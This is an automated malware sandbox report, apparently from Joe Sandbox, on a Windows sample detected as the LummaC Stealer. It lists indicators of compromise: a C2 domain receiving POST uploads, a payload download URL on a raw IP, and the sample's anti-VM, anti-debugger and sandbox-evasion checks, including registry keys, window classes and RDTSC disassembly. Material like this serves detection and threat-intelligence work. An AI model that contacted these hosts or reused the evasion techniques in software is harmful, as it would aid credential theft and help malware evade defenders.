
Windows Analysis Report
ASIr1Bo2x9.exe

Overview

General Information

Sample name: ASIr1Bo2x9.exe (renamed because original name is a hash value)
Original sample name: f9915de2e2ca00d8d19a8d021b433926.exe
Analysis ID: 1648110
MD5: f9915de2e2ca00d8d19a8d021b433926
SHA1: c01697bdad14b649af9616304f356fe04d0258d8
SHA256: f81ed393ec7b3eec60ef2b2d01b03468c38e968e1140ed060e80bdcd859be802
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ASIr1Bo2x9.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\ASIr1Bo2x9.exe" MD5: F9915DE2E2CA00D8D19A8D021B433926)
  • cleanup
No configs have been found
Source: sslproxydump.pcap
Rule: JoeSecurity_LummaCStealer_3
Description: Yara detected LummaC Stealer
Author: Joe Security
    No Sigma rule has matched
    Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
    2025-03-25T14:59:18.501983+0100  2028371  3         Unknown Traffic  192.168.2.4  49723        104.21.80.1     443               TCP
    2025-03-25T14:59:21.115173+0100  2028371  3         Unknown Traffic  192.168.2.4  49724        104.21.80.1     443               TCP
    2025-03-25T14:59:23.183594+0100  2028371  3         Unknown Traffic  192.168.2.4  49725        104.21.80.1     443               TCP
    2025-03-25T14:59:24.583046+0100  2028371  3         Unknown Traffic  192.168.2.4  49726        104.21.80.1     443               TCP
    2025-03-25T14:59:27.097605+0100  2028371  3         Unknown Traffic  192.168.2.4  49727        104.21.80.1     443               TCP
    2025-03-25T14:59:28.417307+0100  2028371  3         Unknown Traffic  192.168.2.4  49728        104.21.80.1     443               TCP
    2025-03-25T14:59:30.257214+0100  2028371  3         Unknown Traffic  192.168.2.4  49729        104.21.80.1     443               TCP

    AV Detection

    Source: ASIr1Bo2x9.exe | Avira: detected
    Source: https://wxayfarer.live/ALosnz6/D | Avira URL Cloud: Label: malware
    Source: http://176.113.115.7:80/mine/random.exe | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzNp | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/$~ | Avira URL Cloud: Label: malware
    Source: http://176.113.115.7/mine/random.exe. | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzl9 | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnz | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnze | Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzc | Avira URL Cloud: Label: malware
    Source: ASIr1Bo2x9.exe | Virustotal: Detection: 58%
    Source: ASIr1Bo2x9.exe | ReversingLabs: Detection: 69%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: ASIr1Bo2x9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49724 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49725 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49729 version: TLS 1.2
    Source: Joe Sandbox View | IP Address: 176.113.115.7
    Source: Joe Sandbox View | IP Address: 104.21.80.1
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.80.1:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.80.1:443
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 51 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9zdQGWOY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 19571 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Mb46dE8tQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 8733 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QzbfvKAlxzljv2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20411 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=vAU7SSh5bM0f | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2322 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Or6Sl54ft9x4ECG6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 585900 | Host: wxayfarer.live
    Source: global traffic | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 89 | Host: wxayfarer.live
    Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: wxayfarer.live
    Source: unknown | HTTP traffic detected: POST /ALosnz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 51 | Host: wxayfarer.live
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7//
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/ran
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe.
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7:80/mine/random.exe
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299973451.0000000000D74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1384924260.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/$~
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnz
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnz6/D
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnzNp
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1325142805.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325382510.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnzc
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1392893647.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408641390.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385095106.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1386096339.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408441458.0000000000E11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnze
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live/ALosnzl9
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1325200671.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wxayfarer.live:443/ALosnz
    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723

    System Summary

    Source: ASIr1Bo2x9.exe | Static PE information: section name: (empty / special characters)
    Source: ASIr1Bo2x9.exe | Static PE information: section name: .idata
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00D8E0D4
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00D8E099
    Source: ASIr1Bo2x9.exe | Static PE information: Section: ZLIB complexity 0.9980898008241759
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306113639.0000000005871000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File read: C:\Users\user\Desktop\ASIr1Bo2x9.exe
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: webio.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Section loaded: version.dll
    Source: ASIr1Bo2x9.exe | Static file information: File size 2990592 > 1048576
    Source: ASIr1Bo2x9.exe | Static PE information: Raw size of cwkdpops is bigger than: 0x100000 < 0x2a8e00

    Data Obfuscation

    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Unpacked PE file: 0.2.ASIr1Bo2x9.exe.eb0000.0.unpack :EW;.rsrc:W;.idata :W;cwkdpops:EW;sifugpmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwkdpops:EW;sifugpmh:EW;.taggant:EW;
    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
    Source: ASIr1Bo2x9.exe | Static PE information: real checksum: 0x2e391a should be: 0x2db05d
    Source: ASIr1Bo2x9.exe | Static PE information: section name: cwkdpops
    Source: ASIr1Bo2x9.exe | Static PE information: section name: sifugpmh
    Source: ASIr1Bo2x9.exe | Static PE information: section name: .taggant
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00D80756 push FFFFFFDDh; ret 0_3_00D8075D
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Code function: 0_3_00D79986 push ecx; retf 0_3_00D799B9
    Source: ASIr1Bo2x9.exe | Static PE information: section name: (empty / special characters) entropy: 7.9841832142391

    Boot Survival

    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSystem information queried: FirmwareTableInformation
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: F15D12 second address: F15D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F30F50FDE2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8FCA second address: 10C8FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8FD1 second address: 10C9022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F30F50FDE28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov di, 7B28h 0x0000002b push 00000000h 0x0000002d jmp 00007F30F50FDE2Ah 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F30F50FDE2Ch 0x0000003b js 00007F30F50FDE26h 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C9022 second address: 10C902C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F30F4CF3436h 0x0000000a rdtsc
